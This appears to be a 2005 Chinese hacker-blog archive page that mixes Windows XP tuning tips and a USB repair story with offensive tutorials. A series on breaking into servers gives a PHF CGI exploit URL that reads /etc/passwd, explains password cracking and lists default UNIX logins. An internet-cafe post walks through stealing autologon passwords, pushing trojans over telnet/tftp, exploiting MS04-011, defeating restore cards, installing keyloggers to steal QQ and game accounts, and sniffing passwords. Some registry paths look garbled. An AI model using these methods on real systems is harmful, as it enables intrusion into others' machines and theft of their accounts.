论坛: 菜鸟乐园 标题: 重装系统的问题 复制本贴地址    
作者: xww8258 [xww8258]    论坛用户   登录
各位大哥,问你们一个很鸟的问题,就是我想重装我的系统,但是我又想保留我d e盘的东西,
我想问的是,我重装了系统,d e盘的东西还在吗,

      http://valala.net/v1/blogs/b_hackbase_1/archive/2005/8/13.aspx

黑客基地

七月 2005年8月 九月

日 一 二 三 四 五 六
31 1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30 31 1 2 3
4 5 6 7 8 9 10

Search
Go
订阅
RSS 2.0
Atom 0.3

存档
九月 2005 (127)
八月 2005 (558)
2005年8月13日 - 随笔
2005年8月13日 15:40
【原创】关于win XP系统的初步优化
关于win XP系统的简单优化[8.13]

By TyranT

随着电脑的普及,我们的生活已经与它密不可分了,而科技的发展之快让我们发现,升级已经成为无法填补

的黑洞,那么要如何省时省钱的使PC的效率提高那,本文将给你指明思路.

内存优化

windows系列的操作系统在使用一段时间后会自行生成许多文件碎片,他们占用着内存,导致运行速度缓慢,

目前虽然物理内存条的价格已经降到很低,但是对某些无收入却有经常使用电脑的人群来说,还是有点奢侈

,例如像我,一个学生,没有自己的经济来源,怎么好意思向父母要钱,只为升级电脑...

幸亏MICROSOFT有考虑到这些,windows操作系统中有份免费的午餐,虚拟内存---virtual memory,相对物理

内存real memory来说虚拟内存的确省了不少钱,硬盘的价格与内存条的价格差相信大家都心知肚明.

windows xp操作系统需要占用内存为128M,运行其他应用程序的时候还要大幅度增加,每个人都可能有在运

行许多应用程序的时候发生计算机假死现象,而过一会就恢复,或者突然跳出对话框,提示内存不足.此时就

要对虚拟内存进行重新编排和设置,增加更多的虚拟内存,才能更好的运行页面文件.

相信如何增加XP的虚拟内存已经不用我多罗嗦.我们来说下简单的优化

首先,软件优化不在讨论范围,我推荐TweakRAM 或者PGWARE SuperRam.使用比较简单,E文稍微过关就能看

明白.

a.关闭自动更新

如果你不是长期接入互连网的用户建议关闭这个功能,改为手动.MICROSOFT不是每时每刻都有新补丁发布.

这样不仅可以减少内存的占用,还能释放15%以上的网宽

b.关闭terminal service

XP系统中terminal service是自动开启的,如果你在CMD下用net start就可以看到,之所以没看到开启3389

端口是因为在我的电脑里的远程标签下,最后的验证没有打开,这个服务在后台运行也会占用部分内存.所

以应该完全关闭terminal service这个服务,

c.关闭系统还原功能

同样在我的电脑的系统还原标签中,他占用的内存可不少,因为XP系统要记录下你的操作以方便日后恢复,

如果你对自己有信心的话还是关闭比较好,就我个人来说,由WIN ME开始就感受到了这个功能是多么的鸡肋

.

d.关闭错误报告

在系统属性里选择,那些错误报告之对microsoft公司有用,对于一般用户来说根本没什么用处,我们何必浪

费心思去给他收集资料那.

e.关闭win xp系统中多效果

系统属性-高级-性能-设置-在弹出的视觉效果标签中勾掉没有实际价值的项目,这样可以大量节省内存的

使用,不过如果你舍不得xp漂亮的外观,还是算了吧.

f.关闭多余的服务

开始-控制面板-管理工具-服务

在这里有许多无用的服务在运行,前几天在黑基首页更新了篇关于服务对照的文章,可以查询下,关闭对自

己没用的服务,如没打印机的用户关闭printer spooler,没有定期执行任务的,关闭task scheduler.一会

在系统优化里我会详细说下.




xp系统优化


a.关闭休眠支持

休眠支持会占用很大的硬盘空间,为了节省资源我们可以关掉他.

控制面板-性能与维护-电源选项-休眠-把勾去掉.

b.关闭dr.watson

运行drwtsn32--转储全部线程上下文以外全不勾掉

c.关闭不必要的服务

alerter
没连局域网的不需要管理警报

clipbook
不需要查看远程剪贴薄的剪贴页面

distributed link tracking client
不使用ntfs分区且没接入inter

distrbuted transaction coordinator
不需要同时处理多个数据库或者文件夹

fax service
不使用win 2000发送或者接收传真

ftp publishing service
不做ftp

iis admin service
不做WWW服务器

indexing service
不提供远程文件索引和快速访问

internet connection sharing
不用win 2000做陆游服务器,让多人共享上网.

ipsec policy agent
没连接到win2k的域
(后面的略,详细请查看我说的文章)



d.优化开关机器时间

HKEY_LOCAL_MACHINE/system/currentcontrolset/control

把waittokillservicetimeour设置1000下的值

HKEY_CURRENT_USER/CONTROLPANEL/DESKTOP

把waittokillapptimeout设置为1000

把hungapptimeout设置为200

HKEY_CURRENT_USER/controlpanel/desktop

把autoendtasks设置为1

e.msconfig

在msconfig的启动标签中所有的项目都是没用的,点全禁用就可以,但是如果是网络用户必须开启防火墙和

病毒监控.

f.优化 win xp prefetcher

prefetcher管理着windows启动的时候的程序初始化信息,指定程序可以在以后使用中快速加

载,prefetcher在默认情况下是打开的,不过性能还是需要进一步提升.


HKEY_LOCAL_MACHINE/SYSTEM/CURRENT/CONTROL/SETCONTROL/SESSIONMANAGER/MEMORYMANAGEENTPREFETCHP

ARAMETERS

把enableprefetcher的值修改为任意,选择自己机器的合适值,默认是3,推荐为5



g.优化压缩文件夹

开始-运行-regsvr32 /u zipfldr.dll

h.优化DLL文件

HKEY_LOCAL_MACHINE/SOFTWARE/MICROSOFT/WINDOWS/CURRENTVERSION/EXPLORER

建立alwaysunloaddll值为1的双字节.




I.优化任务栏

控制面板--日期,时间,区域和语言选项--区域和语言选项--语言

选择详细信息,在设置窗口中选择首选项的语言栏,关闭在桌面上显示语言栏,在第三项前面打勾,如果不需

要语音和手写识别可以关闭高级语言文字服务.这样可以避免QQ,IE等发生假死现象.


J.优化win xp在线升级的问题

用记事本打开c:\windows\system32\drivers\etc\下的hosts文件

在里面添加

207.68.131.21 www.download.windowsupdata.com


K.优化预读文件

当winXP系统使用一段时间后,预读文件夹就会变的很大,里面会有不少死连接文件.这些会延迟系统的启动

时间,所以要删除这些文件.(c:\windows\prefetch)


L.优化NTFS文件系统

ntfs的好处是众所周知的,它具有良好的磁盘性能以及分区管理性能,但是他仍然有美中不足的地方,如果取消更新最后依次磁盘访问,对于容量较大的分区就会减慢系统运行的速度.

HKEY_LOCAL_MACHINE/SYSTEM/currentcontolset/control/filesystem

加一个dword值为1

m.优化动态连接

资源管理器常在内存中留下无用的动态连接,如下方法可消除:

HKEY_LOCAL_MACHINE/SOFTWARE/MICROSOFT/WINDOWS/CURRENTVERSION/EXPLORERALWAYS UNLOADDLL=DW-ORD:1 把值设置为0

对操作系统进行优化,还有许多内容,我无法全部例举出来,将在以后的文章中继续补充.




发布于 由 iver 有 0 篇评论
2005年8月13日 15:38
【原创】新兵的故事第三集
任务三:查杀间谍(请多等会才可以看见全部图片^_^)
当三石昏倒后一睁开眼睛后,发现美女已经不在了,旁边发现了一量废弃的坦克,爬起来想了想刚才美女告诉他封堵端口的办法,心中酝酿了一会,仔细想了想:恩,看来现在我已经掌握了,好,现在去找司令谈谈应该干什么。
坐出租车到基地中••••
    司令:看来我们这回受到袭击不是一件偶然的事情。
    参谋:对,我们内部一定有奸细。
  司令:说的对,我们要采取措施。
  三石:但是我们如何来采取措施呢?怎么办呢?
    司令:你现在去找一下团长B,他应该会有办法,然后你回来报告我。
                              去往团部••••
    团B:恩,我知道了,好,我给你一个武器,他的名字叫做fport,可以用来查看开放的端口。
    三石:团B!我有一个问题要问,上次司令告诉我用netstat这个命令是可以看到端口,为什么要用fport呢?
    团B:哦?司令怎么给你讲的netstat呢?可以给我说说吗?
    三石:当然可以咯,但是你如果要使用netstat这个命令的话,前提是你必须配备携带(安装)TCPIP协议,因为他是一个内部命令,所以我们直接在cmd下面输入netstat ?就可以看到帮助。
以下是通过netstat ? 看到的结果
(以下netstat来自黑色海岸线)
Displays protocol statistics and current TCP/IP network connections.//
显示协议统计和当前的 TCP/IP 网络连接。
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

  -a            Displays all connections and listening ports.// 显示所有连接和侦听端口。此命令可以显示出你的计算机当前所开放的所有端口,其中包括TCP端口和UDP端口。有经验的管理员会经常的使用它,以此来查看计算机的系统服务是否正常,是否被“黑客”留下后门,木马等。比如说我就有一个习惯,在刚刚装了系统配置好服务器以后我就会运行一下netstat -a看看系统开放了什么端口,并记录下来,以便以后作为参考使用,当发现有不明的端口时就可以及时的做出对策。由于这个参数同时还会显示出当前计算机有什么人的IP正连接着你的服务器,所以也是一种实时入侵检测工具,如发现有个IP连接着不正常的端口,你也可以及时做出有效对策
  -e            Displays Ethernet statistics. This may be combined with the -s
                option.//显示以太网统计。该参数可以与 -s 选项结合使用。
这个参数正如所说的,将在下面再跟大家说。
  -n            Displays addresses and port numbers in numerical form.// 以数字格式显示地址和端口号(而不是尝试查找名称)。 大家如果只输入netstat的话就会看见如下类似的结果:
-p proto      Shows connections for the protocol specified by proto; proto
                may be TCP or UDP.  If used with the -s option to display
                per-protocol statistics, proto may be TCP, UDP, or IP.// 显示由 protocol 指定的协议的连接;protocol 可以是 tcp 或 udp。如果与 -s 选项一同使用显示每个协议的统计,protocol 可以是 tcp udp、icmp 或 ip。
这个参数你可以指定查看什么协议的连接状态,比如查看当前计算机正在连接的所有TCP端口
  -r            Displays the routing table.// 显示路由表的内容,这个没有特别的。
  -s            Displays per-protocol statistics.  By default, statistics are
                shown for TCP, UDP and IP; the -p option may be used to specify
                a subset of the default.// 显示每个协议的统计。默认情况下,显示 TCP、UDP、ICMP 和 IP 的统计。-p 选项可以用来指定默认的子集。 这个参数让我们来配合-e来使用。
  interval      Redisplays selected statistics, pausing interval seconds
                between each display.  Press CTRL+C to stop redisplaying
                statistics.  If omitted, netstat will print the current
                configuration information once.
    团B:恩,很好。看来你已经掌握了这个命令了!
    三石:哎呀,不是的,我很多都不知道是什么意思,应该怎么做都不知道啊。你能不能告诉我怎么做啊,司令叫我来找你的,^_^
    团B:-_-!(心想:老头多久搀和进来了)好吧!我一会给你做个演习,你来尝试着来查找间谍(木马)
    三石:谢谢了(心想:竟然管司令叫老头,看我一会回去参你一本,^_^)
    团B:既然是老头吩咐的事,我当然要好好来办,这样吧,查找间谍光靠netstat是不够的,因为他不能察看是哪个文件打开了这个端口的,所以我现在就给你介绍一下fport吧.下面是我fport 的结果


请看,图中,
Pid代表的是进程号
Process 代表的是使用进程
Port 代表端口的意思
Proto 代表的是协议
Path代表的就是路径了,也就是说是该文件打开了端口.
三石:哦,我好象知道拉。
团B:既然知道拉,我们来做个演习。你的目标就是清除一个开放陌生端口的木马

演习中••••
1.先来看看开了哪些端口
 


根据《新兵的故事(端口篇)》得知,7758这个端口有问题
2.使用fport来看看,到底是什么文件打开的这个端口



看来是在G盘的根目录的,nc打开的。好,去把nc删掉。
那现在就来执行命令del(删除的意思)



哇,拒绝访问,三石想:不知道团B耍的什么花招,难道是权限问题?不对,我应该是有权限的,我去windows下面删除看看吧
哇,看看提示


啊哦~~~看来我解决不了,去问问团B吧。哎,真丢人~~~~~~~~。
退出演习••••
三石:团B~~~~~~~~~~对不起,我失败了!
团B:恩,我看了!你的思路很正确,不过卡在最后面了,哎,还是要我再给你两款工具才行。第一个是pslist,这个工具可以查看开启的进程,第二个是 pskill是用来杀进程了,我们通常使用这两个工具来杀掉防火墙以及杀毒软件,一般都会传到webshell上。
三石:哦~我知道了,那我如果想要顺利的删除掉他的话,是不是应该结束掉nc这个进程呢?
团B:对~~好聪明哦(心想:这小子反映迟钝)
三石:好,我去实验看看
第二次实验••••
1.        先用fport查看~
 


好,再用pslist看看,在dos下面运行pslist



发现有nc,好,用pskill来解决



Process nc killed 好了,已经杀掉了,现在去删除看看



好了,大功告成,已经删除了,哈哈~~~~
任务完成
    三石:报告团B,任务顺利完成,下一步请指示
    团B:恩好,今天任务完成的还不错,那么我们下面来••••
    情报员:报告团长~日军已经攻破我前方阵地,司令指示我们发动进攻
    团B:好,我知道了!三石,这个任务就教给你了,你去找美女和你说说,他现在在医院。
    三石:好!
欲知后事如何,请听下回分解
发布于 由 iver 有 0 篇评论
2005年8月13日 15:37
轻松学会入侵网络服务器(2)
三、获得密码文件
        这是最困难的一部分。很明显,如果管理员有那么一个密码文件的话他当然不会放在那里让其它人舒舒服服的拿到的。入侵者必须找到好方法以不进入系统的方式拿到密码文件。这里笔者向大家介绍两种方法,大家可以试试,有可能会成功。
        1.tc目录在FTP服务上不会被锁住,入侵可以用FTP
      client程序使用anoymously匿名帐号登陆,然后检查一下/etc/passwd是否为匿名设置了被读取的权限,如果有马上备份下来使用软件解码。

        2.些系统中,/cgi-bin目录下会有个叫PHF的文件,如果准备入侵的服务器上有的话那就要方便的多了。因为PHF允许使用者对网站系统里的文件作远端读取,以此为据,用户可以使用浏览器抓取p
      asswd文件,只要在浏览器地址栏中键入URL:http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd,其中xxx.xxx.xxx
      是要入侵的网站名。
        如果这两种方法都行不通的话,那入侵者必须实施其它的办法了。
        在有些情况下入侵者找到的密码文件的第二部分是X、!或者*,那么说明该密码文件已经被锁死,这是系统管理员使用的加强安全的手段之一。但是将密码文件完全隐藏起来的情况是不太有的。通常情况下都会有未经锁死的密码文件备份在系统中,这样入侵者就可以加以利用,比如:入侵者通常会寻找/
      etc/shadow目录或类似的目录,看能否找到密码文件的备份。
        四、建立自己的shell帐号
        经过二、三两个关键的步骤入侵者终于拿到了关键的密码文件,并且破解出了密码。现在可以运行TELNET程序,登陆主机了。当连上服务器时服务器会向你显示自己的一些信息,通常是U
      NIX、linux、 aix、 irix、 ultrix、 bsd 甚至是 DOS
      和VAX/Vms;然后是Login提示符出现在屏幕上,这时键入得来的帐号和密码即可登陆系统。此时入侵者就可以利用自己的UNIX知识做自己喜欢做的事了。

        
        最后对一份密码文件做一个分析,该文件内容如下:
        root:1234aaab:0:1:Operator:/:/bin/csh
        nobody:*:12345:12345::/:
        daemon:*:1:1::/:
        sys:*:2:2::/:/bin/csh
        sun:123456hhh:0:1:Operator:/:/bin/csh
        bin:*:3:3::/bin:
        uucp:*:4:8::/var/spool/uucppublic:
        news:*:6:6::/var/spool/news:/bin/csh
        audit:*:9:9::/etc/security/audit:/bin/csh
        sync::1:1::/:/bin/sync
        sysdiag:*:0:1:Old System
        Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
        sundiag:*:0:1:System
        Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag
        tom:456lll45uu:100:20::/home/tom:/bin/csh
        john:456fff76Sl:101:20:john:/home/john:/bin/csh
        henry:AusTs45Yus:102:20:henry:/home/henry:/bin/csh
        harry:SyduSrd5sY:103:20:harry:/home/harry:/bin/csh
        steven:GEs45Yds5Ry:104:20:steven:/home/steven:/bin/csh
        +::0:0:::
        
        其中以“:”分成几个栏位,比如: tom:456lll45uu:100:20:tomchang:/home/tom:/bin/csh的含义是:
        User Name: tom
        Password: 456lll45uu
        User No: 100
        Group No: 20
        Real Name: tom chang
        Home Dir: /home/tom
        Shell: /bin/csh
        
        读者可以发现以上诸如nobody、 daemon、 sys、 bin、 uucp、 news、 audit、 sysdiag、sundiag
      等的密码栏位都是*,也就是说这些帐号的密码都已锁死,无法直接利用。
        
        值得注意的是,许多系统在首次安装后会有一些缺省帐号和密码,这给投机主义的黑客带来方便,以下就是一些UNIX下缺省的帐号和密码。
        ACCOUNT PASSWORD
        ----------- ----------------
        root root
        sys sys / system / bin
        bin sys / bin
        mountfsys mountfsys
        adm adm
        uucp uucp
        nuucp anon
        anon anon
        user user
        games games
        install install
        reboot 供“command login”使用
        demo demo
        umountfsys umountfsys
        sync sync
        admin admin
        guest guest
        daemon daemon
        
        其中 root mountfsys umountfsys install (有 r候 sync也是) 等都是root级别的帐号,
      也就是拥有了sysop (系统管理员)的权限。
        
        最后有必要介绍一下UNIX的日志文件。很多入侵者不希望侵入的电脑追踪他们,那到底如何做那。
        系统管理员主要依靠系统的LOG,即我们时常所说的日志文件来获得入侵的痕迹及入侵者进来的IP和其他信息。当然也有些管理员使用第三方工具来记录侵入电脑的信息,这里主要讲的是一般U
      NIX系统里记录入侵踪迹的文件。  

发布于 由 iver 有 0 篇评论
2005年8月13日 15:36
关闭不需要服务 为Windows系统提速
Windows系统资源直接关系到系统整体的运行速度,随着安装的软件越来越多,许多软件在系统启动时都会自动加载一些服务,占用系统资源,而这些服务大多数时候是处于闲置状态的。Windows系统本身也有一些这样的服务,正常情况下,大多数用户都不会使用,如果能够将这些服务停止,就可以释放出被这些服务占用的系统资源,对提高系统整体运行速度有很大帮助哟,下面就让我们开始吧。
  点击菜单“开始”“运行”,在文本框内键入services.msc,桌面上将会弹出一个服务窗口,列举出了目前系统正在运行的所有服务项目。你会注意到,大多数服务的“启动类型”都被设置为“自动”,说明它们都是在后台自动运行的。下面的表格中列出的15项服务都属于不必要的,用户大可放心地将它们设置为手动运行――如果胆子够大的话,干脆右击它们,选择快捷菜单中的“停止”,中止这些服务。然后,再选择“属性”,根据个人需要设置每项服务的“启动类型:”。即使日后发现由于修改服务的设置而导致系统出现故障,也没关系,重新启动相关服务并将它们的启动类型设置为“自动”即可。

  警报器 (Alerter)

  如果不需要监视网络服务器的话(与Messenger服务一样),一般家用计算机根本不需要传送或接收计算机系统管理来的警示。

  作用:通知选取的使用者及计算机系统管理警示。如果停止这个服务,使用系统管理警示的程序将不会收到通知,所有依存于它的服务将无法启动。

  自动更新 (Automatic Updates)

  如果停用此服务,可以手动从Windows Update 网站上更新操作系统。

  作用:启用重要 Windows 更新的下载及安装。允许Windows于自动联机时,在后台到 Microsoft Servers 自动检查和下载更新修补程序 。

  计算机浏览器 (Computer Browser)

  一般家庭用计算机不需要,除非你的计算机连在局域网上。

  作用:维护网络上更新的计算机清单,并将这个清单提供给做为浏览器的计算机。如果停止这个服务,这个清单将不会被更新或维护,所有依存于它的服务将无法启动。
分布式连结追踪客户端 (Distributed Link Tracking Client)

  独立作业的计算机,或是连接在小型家庭网络中的计算机都不需要。

  作用:维护计算机中或网络/网域不同计算机中 NTFS 档案间的连接。

  应用程序错误报告 (Error Reporting Service)

  如果你已经厌倦了每次程序出故障时都发送错误报告,也根本不指望能够收到微软公司的回信,可以停止这项服务。

  作用:允许对执行于非标准环境中的服务和应用程序的错误报告。

  说明及支持 (Help and Support)

  如果不使用,就将它关闭――万一需要使用帮助文件,它将会自动切换回“自动”的启动类型设置。作用:让说明及支持中心能够在这台计算机上执行。如果这个服务停止,将无法使用说明及支持中心,它的所有依存服务将无法启动。

  IP安全性服务(IPSEC Services)

  如果你的计算机并非处于虚拟私人网络或安全域当中,一般不需要这项服务。

  作用:管理 IP 安全性原则并启动 ISAKMP/Oakley (IKE) 及 IP 安全性驱动程序,协助保护经由网络传送的数据。

  便携的媒体序号(Portable Media Serial Number)

  如果你的计算机没有任何便携媒体播放器的话,就不需要。

  作用:获得系统中媒体播放器的序列号,用于控制盗版音乐文件复制到便携播放器上,如MP3、MD等。

  远程登录 (Remote Registry Service)

  基于安全性的理由,如果没有特别的需求,建议最好关了它。而且,该项服务只有Windows XP Pro才用得着。

  作用:启用远程使用者修改这个计算机上的登录设定。如果这个服务被停止,登录只能由这个计算机上的使用者修改,任何明确依存于它的服务将无法启动。

  二级登录(Secondary Logon)

  基于安全性的理由,建议将该项服务的启动类型设置为“手动”运行。

  作用:在多用户使用的计算机上,某些用户因为是非管理员,导致某些程序无法执行。为了让没有管理员权限的已登录用户可以使用这个程序,WindowsXP设计了这个功能来分配临时的管理员权限。

  服务器(Server)

  如果你不想与其它联网的计算机共享文件或打印机的话,可关闭该服务。

  作用:透过网络为这台计算机提供档案、打印、及命名管道的共享。

  TCP/IP NetBIOS协助程序(TCP/IP NetBIOS Helper Service)

  如果你的计算机没有联网,或者并非与运行Windows 9x的计算机系统同处于一个网络内,就不需要该服务。

  作用:启用 [NetBIOS over TCP/IP (NetBT)] 服务及NetBIOS名称解析的支持。

  布景主题(Themes)

  如果你喜欢使用传统的Windows桌面背景,关闭这项服务可节约4~12MB的资源空间。

  作用:为用户提供使用主题管理的经验。

  WebClient

  基于安全性的理由,你可以尝试关闭――如果导致微软的其它产品或服务无法启动,还可以重新启动它。

  作用:使基于Windows的程序能创建、访问和修改基于Internet的文件。

  无线网络零配置管理(Wireless Zero Configuration)

  如果你的电脑没有接任何无线网络适配卡装置,或是并非处于无线网络之中的话,就没有必要使用该服务。

  作用:为 802.11 适配卡提供自动设定,自动配置无线网络装置。

发布于 由 iver 有 0 篇评论
2005年8月13日 15:31
起死回生 用Ghost修复无法格式化的U盘
我的U盘是SIMPTECH
      牌子的,256兆,在反复尝试制作U盘启动盘的过程中,U盘莫明其妙地坏了,本来在dos下U盘已经可以启动DOS系统了,但后来却无法启动了。
        我进入WINDOWS
      XP系统,可以在“我的电脑”中看到U盘的盘符,点击左键,提示没有格式化,我击右键选“格式化”,无论快速格式化,还是常规格式化,都提示“无法格式化”。因为U盘是在制作启动盘的过程中坏的,我相信不是物理损坏,应该可以修好。
        上网下载了诸如mformat
      V1.0等修复U盘的修复工具,试了多次,没有效果。我又用启动盘加载U盘,想在DOS下用fdisk或DOS下的磁盘修复工具修复,但在dos下不认该U盘,我几乎要放弃了。
      一个偶然的机会,我在克隆系统时,选择克隆的源文件时,我看到了两个盘,第一个是我的硬盘,第二个竞是我的U盘。忽然想到网上曾有用Ghost修复硬盘的文章。我抱着试一试的心态,准备做一个小的ghost文件,恢复到U盘上。在windows
      下,把我的D:分区的文件移到其它分区,用Fat32格式格式化D:分区;重新启动系统到dos下,运行ghost,local→partition→to
      image做一个D:的镜像文件,我命名为d.GHO,因为D:盘没有文件,镜像文件瞬间做完。我再回到ghost的启动界面,local→partition→from
      image,选刚做的镜像文件d.GHO为源文件,恢复到U盘上(此时,千万看准,不要恢复到你的硬盘上的个个分区上,否则,你的那个分区中的文件会全部丢失),瞬间做完。
        项目管理部重新启动系统到windows系统,点击U盘的盘符,顺利打开;试着格式化,一切顺利,空间大小,仍是256兆;试着把其它盘的文件复制到U盘,成功!!!

发布于 由 iver 有 0 篇评论
2005年8月13日 15:31
轻松学会入侵网络服务器(1)
 
在网上有许多网友提出这样的问题:究竟网站的主页是如何被黑的?黑客们到底是如何入侵服务器的?
      在讨论这部分知识前,读者需要知道――入侵网站是非法的;但是在网络上找到网站的入侵漏洞并通知该网站是受到欢迎的。为什么要这样寻找入侵漏洞或入侵哪,著名的黑客H
      ackalot说过“入侵网站是利用所学的知识来学习新的知识的一种办法”,这也就是中国人所常说的“温故而知新”。
        尽管为服务器设计软件的软件工程师们想方设法提高系统的安全性,然而由于系统管理员的水平参差不齐或安全意识底下,往往给黑客提供了入侵的机会。
        其实每一个黑客都有自己独到的方法。笔者对于入侵网站服务器的资料收集了很多,但是因为实际情况的不同,往往造成许多方法的失效;由此可见,每一个网站的情况都不同,需要入侵者区分对待。假设深圳的线路比北京的线路要好的多,从而给了词典穷举很大的方便,深圳用户就可以依靠这个优势在线攻击口令,作为北京的用户就需要优先考虑其它办法了。针对这么多的入侵手段,笔者参考H
      ackalot先生这位黑客界名人的一篇文章给大家介绍一下入侵网站的基本步骤。
        分析一部分的主页被黑的事例可以发现使用入侵者最热衷于入侵Web服务器和FTP服务器,因为相对来说这是最简单的两种途径。在假设读者对U
      NIX系统和WEB SERVER的知识不曾了解的情况下,笔者给出下面的步骤。
        一、了解要入侵的系统
        现在网络上用作服务器的操作系统以UNIX和Linux为主流,如果要入侵这些系统则必须对它们有一个了解。
        大部份在 DOS 上使用的指令在 UNIX 及 Linux 上都有对应的指令(因为早期的dos开发借鉴了UNIX),以下列出在使用
      SHELL帐号 (shell account)时最主要的一些指令对应的dos指令:
        HELP=HELP
        CP=COPY
        MV= MOVE
        LS= DIR
        RM =DEL
        CD=CD
        要看谁同 r也在该系 y上用户可以键入 WHO 指令,要知道系 y上某一位使用者的资料, 可以 I入 FINGER。这些基本的 UNIX
      指令可以让你得到你正使用系 y的信息。
        二、破解密码
        在UNIX操作系统中, 所有系统使用者的密码都存放在一个文件中,这个文件存放在 /etc这个目录下面,
      它的文件名就叫做passwd。如果读者认为所要做的工作就是拿到这个文件按照上面的密码登陆系统的话那就大错特错了。UNIX和Linux下的p
      asswd文件是特殊的,在它里面所有帐号的密码都已经经过重新编译的(也就是前面说过的DES加密方法),而且这些密码所进行的都是单向编译(
      one-way encrypted),也就是说没有办法可以反编译它的(decrypt)。
        但是还是有些程序可以得到这些原始的密码。笔者向大家推荐一个破解密码的程序“Cracker
      Jack”,它也是一个使用字典来对字典文件进行穷举的软件。首先“Cracker
      Jack”会把字典文件里的每一个值进行编译,然后将编译过的值与密码文件中的内容进行比较,得到相同的结果就会报告对应的未经编译密码。这个软件巧妙的绕过密码无法反编译的限制,使用穷举比较获得密码。使用这种原理获得密码的工具有许多,读者可以到网络上去搜寻一下。

发布于 由 iver 有 0 篇评论
2005年8月13日 15:30
网吧入侵之攻无不克
一. 网吧入侵
          入侵的方法很多,但对网吧入侵最常用的方法是什么呢?首先,自动登陆。现在网吧一般都是win2000或者windows
      xp的机器,网管一般都把机子设置为自动登陆!这样我们开机进入系统的时候登陆窗口一闪而过!着时候如果我们findfass.exe试图把登陆账号密码找出来是不会成功的!因为账号密码根本不在内存中,而findfass.exe通过winlogon的PID号和正确的域名中,在内存寻找好段加了密的内存块(保存着加密过的登陆密码),然后对它进行解密,这样就能得到明文的密码。实际上自动登陆的账号密码都在注册表中。我们打开注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
      NT\CurrentVersion\Winlogon\这个目录下,AutoAdminLogon这一项的键值为1,表示自动登陆。为1的时候,打开控制面板的用户和密码,会发现需要密码前面的钩已经去掉了。DefaultUserName对应的键值就是登陆用户名,DefaultPassword对应的键值就是登陆密码。实际上海洋顶端木马2006就有着一功能,原理是一样的,不过因为权限的问题,不一定能读出来。这样,密码账号我们都找出来了。而且你要知道,一个网吧的自动登陆密码账号一般都是一样的,而且网管为了方便网虫上网一般把他们设置在管理员组,至少user组。知道了密码账号还愁入侵不了么?网吧机子的server服务一般是禁用的,那我们就不能用ipc入侵了。opentelnet.exe我们也用不了,因为着个也依赖ipc连接,dameware远程控制也不行,道理一样。我们可以用recton着个小巧实用的工具来开telnet,这个工具在win2000下面特别好使。
          开了telnet后,我们telnet上去,先在本机打开tftpd32.exe,再telnet下面telnet -i myip get
      3721.exe c:\3721.exe,这样就把我们的木马3721.exe比如radmin传过去了。
          再在telnet下面直接运行3721.exe就ok了。
         
      另一个方法就是ms04011漏洞,别以为着个漏洞已经过时了,在网吧这个漏洞还是相当普遍的,许多网吧的网管只会装游戏,重装系统,不重视着写漏洞,懒得打补丁!我们用DSScan扫描192.168.0.1-192.168.0.255,一般会你会很惊喜的。我们到用ms04011溢出工具溢出,一下子就得到了系统权限。
     
         
      还有很多入侵方法,你可以把xscan搬出来扫描一下。很多菜鸟喜欢用啊D工具包来扫网吧的空口令,实际上这个工具扫用户账号密码很弱,以前我试过,我用上面第一种方法发现网吧都有一个密码为空的管理员账号,用啊D工具包只扫出几台机子有这个账号。我经常用我的最爱

      闪电狐――火狐端口扫描器来扫一下网吧主机,第一服务器等。着个扫描器速度很快,扫1到10000端口也要不了几分钟。如果发现服务器开80断口,自然是看是不是架设了网站。再看网站十分有漏洞,想办法传个asp木马上去提升权限。如果发现电影服务器装了serv_u,而且你有了一个账号,可以尝试一下serv_u的溢出。

                二.网吧牧马
         
      在网吧安装木马最重要的是把它的还原破了,现在网吧的还原系统一般有3种,即还原卡,还原精灵,冰点还原精灵。硬盘还原卡其实所谓硬盘保护卡就是在ROM中写了一段HOOK
      INT 13的程序,屏蔽了 
      一些功能调用如AH=3,5等,在中断向量表中INT 13的SEG,OFFSET 
      描述为[13h*4+2],[13h*4],将此中的程序先保存后,再替换为自己的代码, 
      当你AH=2的时,它便会call原始INT 13地址来完成(商周)作. 
      只要找到原始INT 13入口便可以为所欲为. 
      具体过程如下: 
      开机过程按住F8键,进入纯dos环境, 注";"后为注释. 
      出现提示符c:, 
      键入c:\debug, 
      - a100 
      - xor ax,ax 
      - int 13 
      - int3 
      ; 寻找原始的int 13入口. 
      然后输入t回车,不断的重复,直到显示的地址形如 F000:xxxx 
      ,后面的指令为:mov dl,80 (练练眼力-。按q退出. 
      记下这一地址, 在(0:13H*4)=0:4cH 处填入这个地址。 
      例如俺的得到的地址是F000:9A95 
      再次运行debug ,键入: 
      -e 0:4c 95 9A 00 F0 e的作用将数据表"95 9A 00 f0",写入地址0:4c开始的字节中. 
      -q 
      注: 填的时候要仔细,填错的话会死机。ok,破解完成. 
      这时在提示符c:\键入 
      c:\win 
      进入windows系统即可,那么这次你在windows系统中的一切(商周)作,随着下一次 
      的启动都会被还原卡存储起来。 
      这种办法大家都知道,不过操作起来也有点危险,弄不好启动不了。而且win2000没有dos环境,到底性不行呢?呵呵,我还没有
      做这个危险的尝试。不过望上有很多关于破解还原卡的工具可以下载,到底什么工具最好使,大家自己测试。
      至于还原卡,网上有密码读取器,不过着工具只能在win98下面使用。在win2k下面我们可以用winhex来破解,次方法很奏效,
      应该是最好的办法。先随便输个错误的密码,弹出错误窗口后不动,用winhex查找主要内存,找到还原精灵,再搜索我们开始
      输的错误密码。在错误密码的旁边应该就有正确的密码。我们输入正确的密码转存就行了。这里很简单,就不截图了!
        至于冰点还原,好像还没有破解办法,这个的确很厉害。不过他有个选项,就是重启多少次后不还原,没事你可以多重启
      试一下,别把机子整坏了就行。
        破了还原后就装木马了。我们最好装键盘记录或密码截获木马,盗qq,游戏账号,邮箱账号等等。比如密码结巴等工具,也可以
      把浏览器默认主页设置为你的网页木马。如果网吧的默认主页都是一样,而你有能力入侵了那个网站,在默认主页上挂马那更好!
                  三.网吧嗅探。
       
      如果你想知道网吧某个mm的qq号,那你就用QQSniffer,Ver2005build5.5。也可以用xniffer,用于嗅探域网中或本机的pop.smtp.ftp等明文传输的tcp/ip协议密码。格式是
      xsiff.exe -pass -hide -log pass.log  xsiff.exe -tcp -udp -asc -addr
